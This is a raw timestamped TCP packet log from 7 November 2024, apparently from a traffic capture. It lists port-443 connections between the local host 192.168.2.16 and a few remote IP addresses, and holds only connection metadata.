                                                                Nov 7, 2024 21:39:58.655267000 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.655343056 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.657543898 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.657623053 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.658155918 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.658163071 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.700135946 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.801140070 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801204920 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801243067 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801260948 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.801280975 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801327944 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801352978 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.801359892 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801403046 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.801408052 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801498890 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801542044 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.801547050 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801558018 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.801604986 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.919217110 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919298887 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919351101 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919359922 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.919383049 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919428110 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.919763088 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919857979 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.919897079 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.919904947 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.920396090 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.920442104 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.920452118 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:58.965152979 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:58.965173960 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.012101889 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.038080931 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038151026 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038223028 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038317919 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.038330078 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038345098 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038372993 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.038405895 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.038451910 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.038460970 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.039175987 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.039232969 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.039232969 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.039252996 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.039304972 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.121043921 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.165477991 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.165549040 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.165565014 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.168745041 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.168802977 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.168812037 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.171093941 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.171139956 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.171202898 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.171211958 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.171498060 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.173577070 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.176074982 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.176184893 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.176193953 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.220112085 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.241452932 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.276241064 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.276316881 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.276333094 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.276382923 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.281429052 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.281435966 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.281498909 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.281507969 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.281548977 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.286187887 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.286195040 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.286273003 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.358591080 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.358602047 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.358675957 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.395422935 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.395431995 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.395637035 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.398067951 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.398075104 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.398147106 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.399584055 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.399655104 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.402595997 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.402661085 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.402669907 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.402730942 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.402784109 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.402837992 CET49706443192.168.2.16104.17.25.14
                                                                Nov 7, 2024 21:39:59.402854919 CET44349706104.17.25.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.415465117 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:39:59.415498972 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.415574074 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:39:59.415785074 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:39:59.415800095 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:39:59.440085888 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440108061 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:39:59.440176964 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440395117 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440432072 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:39:59.440491915 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440689087 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440701008 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:39:59.440886974 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:39:59.440896034 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:39:59.849101067 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:40:00.025175095 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.025501966 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.025526047 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.026582956 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.026678085 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.026971102 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.027034998 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.027107000 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.027115107 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.059041023 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.059334040 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.059349060 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.060472012 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.060547113 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.061542988 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.061552048 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.061602116 CET44349711188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.061645985 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.061666965 CET49711443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.061980963 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.062016964 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.062112093 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.062314034 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.062330008 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.072114944 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.085040092 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.085975885 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.085993052 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.086952925 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.087032080 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087352991 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087364912 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087405920 CET44349710188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.087415934 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087479115 CET49710443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087753057 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.087786913 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.087867022 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.088082075 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.088093996 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.176994085 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.177038908 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.177140951 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.177154064 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.179503918 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.179533958 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.179568052 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.179577112 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.179621935 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.181077957 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.182585001 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.182640076 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.182647943 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.184087038 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.184137106 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.184144020 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.231075048 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.294123888 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.295114994 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.295169115 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.295190096 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.296607971 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.296660900 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.296669960 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.297739983 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.297785044 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.297791958 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.300983906 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.301011086 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.301028967 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.301037073 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.301084995 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.410615921 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.411950111 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.412009954 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.412023067 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.413639069 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.413696051 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.413703918 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.415226936 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.415273905 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.415282011 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.416879892 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.416937113 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.416944027 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.418814898 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.418842077 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.418870926 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.418879986 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.418916941 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.527947903 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.528728008 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.528801918 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.528830051 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.529964924 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.530019999 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.530031919 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.532365084 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.532396078 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.532430887 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.532440901 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.532495022 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.533723116 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.579088926 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.645711899 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.645724058 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.645823002 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.647283077 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.647289991 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.647353888 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.648309946 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.649681091 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.649736881 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.649750948 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.649801016 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.652440071 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.652507067 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.674570084 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.674825907 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.674843073 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.676112890 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.676172972 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.677155018 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.677217960 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.677412987 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.677421093 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.695103884 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.695343971 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.695358038 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.696304083 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.696451902 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.696646929 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.696705103 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.722090006 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.737123013 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:00.737139940 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:00.763087988 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.763159990 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.764344931 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.764411926 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.766596079 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.766654015 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.769273996 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.769332886 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.769345045 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.769365072 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.769417048 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.769575119 CET49707443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:00.769591093 CET44349707104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:00.785079002 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.267879963 CET4968980192.168.2.16192.229.211.108
                                                                Nov 7, 2024 21:40:01.523190022 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.524034977 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.524075985 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.524113894 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.524136066 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.524185896 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.525270939 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.525409937 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.525465965 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.525631905 CET49714443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.525645971 CET44349714188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.591912985 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.591974020 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592111111 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592113972 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592226028 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592257023 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592375994 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592407942 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592526913 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592556000 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592571974 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592577934 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592633963 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592633963 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592643976 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592660904 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592689991 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592689991 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592704058 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592714071 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592731953 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592744112 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:01.592787027 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:01.592794895 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.209868908 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.210282087 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.210309982 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.211411953 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.211483955 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.211990118 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212007046 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212047100 CET44349716188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.212100029 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212126017 CET49716443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212524891 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212553978 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.212627888 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212871075 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.212882042 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.264113903 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:40:02.717165947 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:02.717201948 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:02.717281103 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:02.717489958 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:02.717504978 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:02.815289974 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.815608025 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.815635920 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.815980911 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.816301107 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:02.816375017 CET44349718188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:02.869123936 CET49718443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:03.557163000 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:03.557261944 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:03.557327986 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:03.563780069 CET49715443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:03.563806057 CET44349715188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:03.601125956 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:03.601377010 CET49719443192.168.2.16142.250.186.100
                                                                Nov 7, 2024 21:40:03.601397991 CET44349719142.250.186.100192.168.2.16
                                                                Nov 7, 2024 21:40:03.602297068 CET44349719142.250.186.100192.168.2.16
